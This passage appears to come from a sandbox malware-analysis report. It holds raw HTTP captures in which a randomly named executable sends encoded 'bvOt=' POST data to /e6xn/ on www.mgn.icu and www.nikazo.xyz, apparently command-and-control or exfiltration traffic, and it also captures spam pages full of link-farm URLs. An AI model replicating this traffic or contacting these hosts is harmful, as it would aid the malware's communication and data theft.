b2 b3 e6 ba 90 e8 9c 98 e8 9b 9b e8 b5 84 e8 ae af e7 bd 91 e4 b8 ba e5 b9 bf e5 a4 a7 e7 8e a9 e5 ae b6 e6 8f 90 e4 be 9b e6 9c 80 e6 96 b0 e3 80 81 e6 9c 80 e5 85 a8 e3 80 81 e6 9c 80 e5 85 b7 e7 89 b9 e8 89 b2
                                                                                  Data Ascii: 7d60<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <title>##__</title> <meta name="keywords" content=",##,,"/> <meta name="description" content="
                                                                                  Mar 18, 2024 14:47:15.840405941 CET1286INData Raw: e7 9a 84 e6 b2 b3 e6 ba 90 e8 9c 98 e8 9b 9b e8 b5 84 e8 ae af ef bc 8c e5 90 8c e6 97 b6 e8 bf 98 e6 9c 89 e5 90 84 e7 a7 8d e5 85 ab e5 8d a6 e5 a5 87 e9 97 bb e8 b6 a3 e4 ba 8b e3 80 82 e7 9c 8b e8 9c 98 e8 9b 9b e8 b5 84 e8 ae af ef bc 8c e5
                                                                                  Data Ascii: "/> <link rel="stylesheet" href="/templates/moban25/css/style.css" media="screen" type="text/css"/> <link rel="stylesheet" h
                                                                                  Mar 18, 2024 14:47:15.840451002 CET1286INData Raw: 3c 76 61 72 20 64 72 6f 70 7a 6f 6e 65 3d 22 34 36 36 30 34 30 22 3e 3c 2f 76 61 72 3e 3c 76 61 72 20 64 72 6f 70 7a 6f 6e 65 3d 22 32 37 32 35 31 35 22 3e 3c 2f 76 61 72 3e 3c 74 69 6d 65 20 64 72 6f 70 7a 6f 6e 65 3d 22 31 37 30 33 38 31 22 3e
                                                                                  Data Ascii: <var dropzone="466040"></var><var dropzone="272515"></var><time dropzone="170381"></time><sup lang="462320"></sup><div class="header-nav"> <map draggable="332506"></map><var dropzone="684721"></var><bdo date-time="238248"></bdo><time d
                                                                                  Mar 18, 2024 14:47:15.840533972 CET1286INData Raw: 91 e6 8a 80 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 75 6b 61 2e 67 6a 67 6d 6d 2e 74 6f 70 2f 39 69 69 37 6b 2f 22 3e e7 a4 be e4 bc 9a 3c 2f 61
                                                                                  Data Ascii: </a></li> <li><a href="http://wuka.gjgmm.top/9ii7k/"></a></li> </ul> </div> </div></div><map date-time="969317"></map><sup lang="997759"></sup><area draggable="379266"></area><ins draggable="
                                                                                  Mar 18, 2024 14:47:15.840670109 CET1286INData Raw: 37 22 3e 3c 2f 6d 61 70 3e 3c 62 64 6f 20 6c 61 6e 67 3d 22 35 30 37 34 38 34 22 3e 3c 2f 62 64 6f 3e 3c 66 6f 6e 74 20 6c 61 6e 67 3d 22 39 34 35 37 30 31 22 3e 3c 2f 66 6f 6e 74 3e 3c 62 64 6f 20 64 69 72 3d 22 34 39 35 37 39 32 22 3e 3c 2f 62
                                                                                  Data Ascii: 7"></map><bdo lang="507484"></bdo><font lang="945701"></font><bdo dir="495792"></bdo><sup draggable="698885"></sup><var dropzone="129881"></var><tt dir="169525"></tt><div class="content-box"> <ul> <li>
                                                                                  Mar 18, 2024 14:47:15.840773106 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 e4 ba 8c e5 a9 9a e7 9a 84 e6 9c 8b e5 8f 8b e5 82 ac e6 88 91 e8 b5 b6 e7 b4 a7 e7 bb 93 e5 a9 9a 0a 20
                                                                                  Data Ascii: <p> <b>[ <a href="http://83zj4.d2um5.top/x88q/"></a> ]</b> </p> <bt>2024-03-18 00:38:19</b
                                                                                  Mar 18, 2024 14:47:15.840893030 CET1286INData Raw: 87 e7 89 a9 e8 af ad e3 80 8b e6 9c 80 e7 bb 88 e5 ad a3 e8 b7 af e9 80 8f e6 9b 9d e5 85 89 ef bc 9a e5 b0 8f 31 31 e3 80 81 e8 bf 88 e5 85 8b e7 ad 89 e4 ba ba e4 ba ae e7 9b b8 3c 2f 61 3e 3c 2f 68 33 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: 11</a></h3> <p> <b>[ <a href="http://www.oc7o0.top/aoekqf/"></a> ]</b> <
                                                                                  Mar 18, 2024 14:47:15.841022015 CET1286INData Raw: 67 61 6e 67 20 76 69 6f 6c 65 6e 63 65 20 69 73 20 64 65 76 61 73 74 61 74 69 6e 67 20 48 61 69 74 69 61 6e 73 2c 20 77 69 74 68 20 6d 61 6a 6f 72 20 63 72 69 6d 65 20 61 74 20 61 20 6e 65 77 20 68 69 67 68 2c 20 55 4e 20 65 6e 76 6f 79 20 73 61
                                                                                  Data Ascii: gang violence is devastating Haitians, with major crime at a new high, UN envoy says</a></h3> <p> <b>[ <a href="http://www.oc7o0.top/7fdwd
                                                                                  Mar 18, 2024 14:47:15.841094017 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 31 71 77 66 62 77 2e 32 67 36 70 6b 2e 74 6f 70 2f 63 31 38 2f 77 39 69 2e 78 6c 73 22 3e 22 eb b0 95 ec 88 98 ec b9 a0 20 eb 95 8c 20 eb 96 a0
                                                                                  Data Ascii: <h3><a href="http://f1qwfbw.2g6pk.top/c18/w9i.xls">" ", </a></h3> <p>
                                                                                  Mar 18, 2024 14:47:15.841145039 CET1286INData Raw: 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 74 3e 32 30 32 34 2d 30 33 2d 31 38 20 30 31 3a 30 38 3a 31 34 3c 2f 62 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20
                                                                                  Data Ascii: /p> <bt>2024-03-18 01:08:14</bt> </li> <li> <h3><a href="https://zbgzs.5pych.top/zic/qxk3gc.doc">
                                                                                  Mar 18, 2024 14:47:15.841183901 CET1286INData Raw: 22 68 74 74 70 73 3a 2f 2f 76 67 6d 2e 33 69 34 37 6a 2e 74 6f 70 2f 33 66 31 64 2f 22 3e e6 9f a5 e7 9c 8b e5 85 a8 e6 96 87 3c 2f 61 3e 20 5d 3c 2f 62 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20
                                                                                  Data Ascii: "https://vgm.3i47j.top/3f1d/"></a> ]</b> </p> <bt>2024-03-18 04:00:41</bt> </li> <li> <h3><a href="https://h8w.soaw8.top/mthsy3w/eonaph.doc


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.2.104973349.0.230.183806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:47:22.032779932 CET736OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.mgn.icu
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 193
                                                                                  Origin: http://www.mgn.icu
                                                                                  Referer: http://www.mgn.icu/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 71 4e 4d 6e 41 34 70 41 71 6f 78 6b 6d 70 30 71 30 75 52 64 58 4e 4c 75 43 41 33 4a 57 42 6e 66 4f 2f 33 70 31 66 51 35 62 34 31 77 49 34 6f 6c 42 71 30 33 50 36 62 48 4e 51 31 32 76 49 77 39 63 5a 75 49 4d 67 79 77 2b 53 50 2b 37 59 63 57 42 36 77 71 4f 51 54 4b 65 4c 4f 45 39 6f 4f 35 73 75 37 36 58 59 6e 55 52 76 63 74 2f 78 66 72 33 4c 67 6e 59 4a 59 33 54 69 75 51 51 58 38 66 6b 41 72 36 58 63 4b 6a 6c 65 6c 50 45 46 76 50 4c 6f 50 76 65 69 38 49 2b 70 34 44 58 33 6b 75 52 34 57 35 4a 4e 68 7a 35 75 50 76 31 30 59 59 6b 77 6e 42 37 49 72 49 5a 64 4a 30
                                                                                  Data Ascii: bvOt=qNMnA4pAqoxkmp0q0uRdXNLuCA3JWBnfO/3p1fQ5b41wI4olBq03P6bHNQ12vIw9cZuIMgyw+SP+7YcWB6wqOQTKeLOE9oO5su76XYnURvct/xfr3LgnYJY3TiuQQX8fkAr6XcKjlelPEFvPLoPvei8I+p4DX3kuR4W5JNhz5uPv10YYkwnB7IrIZdJ0
                                                                                  Mar 18, 2024 14:47:22.337857008 CET179INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:47:22 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/7.0.28
                                                                                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  18192.168.2.104973449.0.230.183806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:47:24.864581108 CET760OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.mgn.icu
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 217
                                                                                  Origin: http://www.mgn.icu
                                                                                  Referer: http://www.mgn.icu/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 71 4e 4d 6e 41 34 70 41 71 6f 78 6b 6e 4a 6b 71 31 4a 4e 64 65 4e 4c 74 4a 67 33 4a 59 68 6e 62 4f 2f 7a 70 31 63 64 69 62 4f 46 77 4a 59 59 6c 41 6f 4d 33 4d 36 62 48 44 77 31 7a 79 34 77 41 63 5a 72 33 4d 68 65 77 2b 53 72 2b 37 63 59 57 41 4e 6b 74 42 67 54 79 4c 62 4f 47 35 6f 4f 35 73 75 37 36 58 5a 43 2f 52 72 34 74 2f 42 76 72 32 71 67 6f 52 70 59 77 46 53 75 51 61 33 38 62 6b 41 71 5a 58 64 57 5a 6c 63 64 50 45 45 66 50 4b 38 6a 6f 51 69 38 4f 79 35 35 62 58 31 35 70 55 36 4b 39 44 75 39 53 70 65 58 36 79 56 35 66 31 68 47 57 6f 2f 33 47 58 62 38 65 72 39 4f 61 35 47 2f 4d 7a 6f 34 37 42 6a 6d 73 34 30 58 71 67 51 3d 3d
                                                                                  Data Ascii: bvOt=qNMnA4pAqoxknJkq1JNdeNLtJg3JYhnbO/zp1cdibOFwJYYlAoM3M6bHDw1zy4wAcZr3Mhew+Sr+7cYWANktBgTyLbOG5oO5su76XZC/Rr4t/Bvr2qgoRpYwFSuQa38bkAqZXdWZlcdPEEfPK8joQi8Oy55bX15pU6K9Du9SpeX6yV5f1hGWo/3GXb8er9Oa5G/Mzo47Bjms40XqgQ==
                                                                                  Mar 18, 2024 14:47:25.169032097 CET179INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:47:25 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/7.0.28
                                                                                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  19192.168.2.104973549.0.230.183806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:47:27.692848921 CET1773OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.mgn.icu
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 1229
                                                                                  Origin: http://www.mgn.icu
                                                                                  Referer: http://www.mgn.icu/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 71 4e 4d 6e 41 34 70 41 71 6f 78 6b 6e 4a 6b 71 31 4a 4e 64 65 4e 4c 74 4a 67 33 4a 59 68 6e 62 4f 2f 7a 70 31 63 64 69 62 4f 4e 77 4a 70 34 6c 42 50 59 33 4e 36 62 48 64 67 31 49 79 34 77 52 63 66 44 7a 4d 68 44 46 2b 51 6a 2b 36 35 4d 57 48 38 6b 74 57 51 54 79 4a 62 4f 48 39 6f 4f 57 73 71 57 7a 58 5a 53 2f 52 72 34 74 2f 44 33 72 79 37 67 6f 64 4a 59 33 54 69 75 55 51 58 38 7a 6b 41 54 69 58 64 54 6d 6c 73 39 50 46 6b 50 50 47 76 62 6f 59 69 38 4d 78 35 35 49 58 31 31 6d 55 37 6d 4c 44 74 67 35 70 64 33 36 78 45 59 56 69 54 43 7a 78 38 37 67 65 62 73 36 34 72 65 69 34 6e 79 55 35 49 6b 30 53 68 54 48 78 6b 2b 38 7a 76 6b 39 6a 76 4a 46 6f 51 4e 31 4b 6d 72 75 37 72 5a 58 35 6a 56 46 34 54 67 59 64 36 77 2b 51 6a 51 37 32 43 7a 6b 67 45 7a 6a 4d 69 4c 66 46 51 48 7a 44 31 6e 49 46 31 6d 72 45 63 48 7a 61 39 38 37 6a 38 4a 6b 2f 59 32 39 66 68 58 35 6a 44 77 6c 38 73 58 63 49 78 6d 63 37 70 64 6d 32 49 33 72 6d 6e 30 5a 4b 6b 68 4e 47 74 2b 51 48 6d 38 68 46 52 6b 64 2f 34 5a 54 71 6e 43 79 53 51 66 45 6b 41 51 56 46 44 35 45 38 78 62 76 55 4a 4a 52 65 7a 74 35 4e 45 35 79 78 51 77 68 57 33 46 4f 31 32 5a 56 38 4c 78 37 2f 69 52 31 36 63 4a 64 32 31 51 2b 59 51 71 33 56 37 5a 64 43 48 50 4b 5a 59 67 38 68 34 58 53 63 49 77 70 56 79 4f 45 42 42 6e 53 4c 6d 4c 4d 61 37 2f 72 48 41 50 7a 34 53 4b 6e 4c 31 45 36 6d 45 51 78 74 72 6e 65 30 77 36 66 76 4c 7a 6e 4d 75 2f 47 46 64 64 58 64 32 61 61 45 44 78 6b 63 7a 6a 6f 47 59 68 38 37 47 54 2f 5a 5a 59 6b 56 58 56 37 53 79 70 7a 72 2b 41 5a 6e 41 2b 37 69 74 45 32 70 7a 2b 74 53 62 73 59 6e 67 58 68 79 52 48 71 39 50 79 4f 69 35 7a 6d 4c 2f 70 6c 37 70 67 5a 75 6a 57 30 55 74 56 57 4b 31 56 32 66 4c 59 39 51 59 69 58 46 50 4a 6a 4d 31 63 55 66 53 73 70 2f 50 37 32 4e 4f 2f 45 6b 47 6a 31 38 46 4a 5a 34 42 6e 7a 52 4f 58 64 5a 55 36 68 61 42 4b 64 57 59 35 2b 37 56 6a 63 5a 51 62 59 74 41 2b 4c 56 4d 4b 4a 62 64 6f 53 6d 79 73 4a 72 42 2f 57 44 55 50 37 4e 48 65 69 59 2b 37 79 41 34 48 4b 65 78 66 5a 2b 63 48 6f 62 61 6b 58 4f 69 53 59 37 58 35 4a 31 57 61 64 57 5a 41 69 39 37 6a 6a 69 56 37 64 77 6b 47 6e 51 47 61 35 6f 30 35 6d 61 4c 71 69 50 50 79 5a 77 55 51 4b 59 56 39 46 74 72 35 41 63 54 57 77 6f 64 44 52 4e 4b 67 2b 77 69 33 68 6e 55 4b 36 69 64 6c 63 53 6a 36 63 63 38 31 33 4e 53 76 53 4f 37 75 32 51 55 43 7a 72 4a 79 55 6e 48 56 55 68 4c 36 50 37 74 47 66 2f 61 6e 66 6d 49 51 30 65 78 4f 79 70 6a 48 48 35 62 79 33 55 2b 34 38 6c 62 38 31 45 50 73 6d 48 66 72 43 43 59 56 5a 78 47 70 66 4a 4c 79 34 74 41 39 33 42 72 79 32 36 51 37 73 4f 37 66 50 68 48 2b 72 51 44 74 4b 49 4b 4b 69 7a 38 32 32 41 59 39 73 72 6c 39 6b 6b 63 34 54 46 65 6c 6f 63 62 45 55 45 37 2f 4a 63 37 6c 5a 4e 39 51 34 72 52 41 6d 37 6a 71 6c 6f 33 66 4c 78 6d 75 62 58 4d 75 42 56 70 34 32 6e 42 33 4d 4d 53 72 52 54 33 66 56 49 31 54 39 41 30 77 76 30 36 6c 39 7a 54 4d 69 54 2f 35 32 43 72 71 57 65 43 79 4e 36 75 2f 53 2b 65 57 36 67 71 30 64 67 30 74 6d 2f 65 55 32 6e 45 39 6a 4b 6c 39 30 58 47 72 39 6b 45 5a 56 2b 4c 43 69 6b 46 44 73 37 45 66 69 74 4e 61 52 57 6d 65 49 54 42 37 74 35 61 52 6a 39 74 49 73 46 4a 31 52 34 30 33 51 34 37 32 46 64 50 2b 35 35 55 4d 63 61 42 71 76 31 33 48 31 4f 52 59 39 6c 4f 63 69 55 36 31 68 49 78 62 6f 77 71 2f 64 49 4c 75 42 6f 43 32 54 6b 57 63 6a 36 62 4a 75 56 53 62 53 69 63 7a 6e 4f 35 43 67 6b 58 4d 2f 36 52 4e 64 72 63 6d 47 64 66 6d 34 55 47 53 4d 54 4b 74 36 4a 4b 6f 4c 6a 51 4d 4e 63 44 56 65 33 36 52 68 4f 46 4c 56 39 34 43 53 4e 62 37 46 38 69 36 4a 33 34 36 71 51 48 55 79 73 78 2f 69 31 58 6d 32 7a 30 6e 70 36 46 56 77 66 6e 45 65 63 48 77 79 69 65 68 6e 2b 66 30 6b 4d 50 65 64 71 47 4c 47 64 44 66 4f 58 5a 69 42 2f 59 58 57 45 65 4d 3d
                                                                                  Data Ascii: bvOt=qNMnA4pAqoxknJkq1JNdeNLtJg3JYhnbO/zp1cdibONwJp4lBPY3N6bHdg1Iy4wRcfDzMhDF+Qj+65MWH8ktWQTyJbOH9oOWsqWzXZS/Rr4t/D3ry7godJY3TiuUQX8zkATiXdTmls9PFkPPGvboYi8Mx55IX11mU7mLDtg5pd36xEYViTCzx87gebs64rei4nyU5Ik0ShTHxk+8zvk9jvJFoQN1Kmru7rZX5jVF4TgYd6w+QjQ72CzkgEzjMiLfFQHzD1nIF1mrEcHza987j8Jk/Y29fhX5jDwl8sXcIxmc7pdm2I3rmn0ZKkhNGt+QHm8hFRkd/4ZTqnCySQfEkAQVFD5E8xbvUJJRezt5NE5yxQwhW3FO12ZV8Lx7/iR16cJd21Q+YQq3V7ZdCHPKZYg8h4XScIwpVyOEBBnSLmLMa7/rHAPz4SKnL1E6mEQxtrne0w6fvLznMu/GFddXd2aaEDxkczjoGYh87GT/ZZYkVXV7Sypzr+AZnA+7itE2pz+tSbsYngXhyRHq9PyOi5zmL/pl7pgZujW0UtVWK1V2fLY9QYiXFPJjM1cUfSsp/P72NO/EkGj18FJZ4BnzROXdZU6haBKdWY5+7VjcZQbYtA+LVMKJbdoSmysJrB/WDUP7NHeiY+7yA4HKexfZ+cHobakXOiSY7X5J1WadWZAi97jjiV7dwkGnQGa5o05maLqiPPyZwUQKYV9Ftr5AcTWwodDRNKg+wi3hnUK6idlcSj6cc813NSvSO7u2QUCzrJyUnHVUhL6P7tGf/anfmIQ0exOypjHH5by3U+48lb81EPsmHfrCCYVZxGpfJLy4tA93Bry26Q7sO7fPhH+rQDtKIKKiz822AY9srl9kkc4TFelocbEUE7/Jc7lZN9Q4rRAm7jqlo3fLxmubXMuBVp42nB3MMSrRT3fVI1T9A0wv06l9zTMiT/52CrqWeCyN6u/S+eW6gq0dg0tm/eU2nE9jKl90XGr9kEZV+LCikFDs7EfitNaRWmeITB7t5aRj9tIsFJ1R403Q472FdP+55UMcaBqv13H1ORY9lOciU61hIxbowq/dILuBoC2TkWcj6bJuVSbSicznO5CgkXM/6RNdrcmGdfm4UGSMTKt6JKoLjQMNcDVe36RhOFLV94CSNb7F8i6J346qQHUysx/i1Xm2z0np6FVwfnEecHwyiehn+f0kMPedqGLGdDfOXZiB/YXWEeM=
                                                                                  Mar 18, 2024 14:47:27.997659922 CET179INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:47:27 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/7.0.28
                                                                                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  20192.168.2.104973649.0.230.183806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:47:30.526801109 CET493OUTGET /e6xn/?bvOt=nPkHDMcb1JQH2fM03fg+aIDrHSSiblzQLJDfzfVFS5dXE5xkefwXFeSdKwFU7agvUteWFQW2j0bTvqR9HNEHAhnYAdzU3M7ag8PlDKnWcqNy6jrKrg==&CVZ=R6q4lTVpfZfT_D HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.mgn.icu
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:47:30.837378979 CET179INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:47:30 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/7.0.28
                                                                                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  21192.168.2.104973766.29.152.141806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:47:36.204870939 CET745OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.nikazo.xyz
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 193
                                                                                  Origin: http://www.nikazo.xyz
                                                                                  Referer: http://www.nikazo.xyz/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 53 49 52 70 50 34 34 43 71 38 52 52 4b 79 6f 70 37 36 65 57 45 58 74 63 53 57 52 50 53 59 77 6a 75 37 6f 44 5a 49 35 50 76 5a 79 43 48 37 53 46 30 4f 31 35 4d 7a 2f 6b 66 45 4a 30 4c 65 61 76 34 38 71 72 6b 37 7a 56 56 4b 76 34 6c 74 51 68 6e 65 2b 57 6f 6f 36 6d 48 53 6d 45 48 62 6b 77 35 33 6d 30 58 7a 73 4b 36 4d 58 57 30 66 78 41 64 41 50 78 66 70 61 33 51 32 61 44 50 4c 63 45 32 2f 52 33 76 6e 2f 4e 58 42 50 54 69 6d 4b 33 66 63 46 30 38 79 4c 51 34 35 6a 79 39 48 61 4c 32 56 37 79 6c 50 33 52 30 66 6e 77 72 63 75 4d 6d 5a 71 4e 73 6e 2b 41 4a 76 2f 70
                                                                                  Data Ascii: bvOt=SIRpP44Cq8RRKyop76eWEXtcSWRPSYwju7oDZI5PvZyCH7SF0O15Mz/kfEJ0Leav48qrk7zVVKv4ltQhne+Woo6mHSmEHbkw53m0XzsK6MXW0fxAdAPxfpa3Q2aDPLcE2/R3vn/NXBPTimK3fcF08yLQ45jy9HaL2V7ylP3R0fnwrcuMmZqNsn+AJv/p
                                                                                  Mar 18, 2024 14:47:36.525033951 CET533INHTTP/1.1 404 Not Found
                                                                                  Date: Mon, 18 Mar 2024 13:47:36 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  22192.168.2.104973866.29.152.141806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:47:39.612848043 CET769OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.nikazo.xyz
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 217
                                                                                  Origin: http://www.nikazo.xyz
                                                                                  Referer: http://www.nikazo.xyz/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
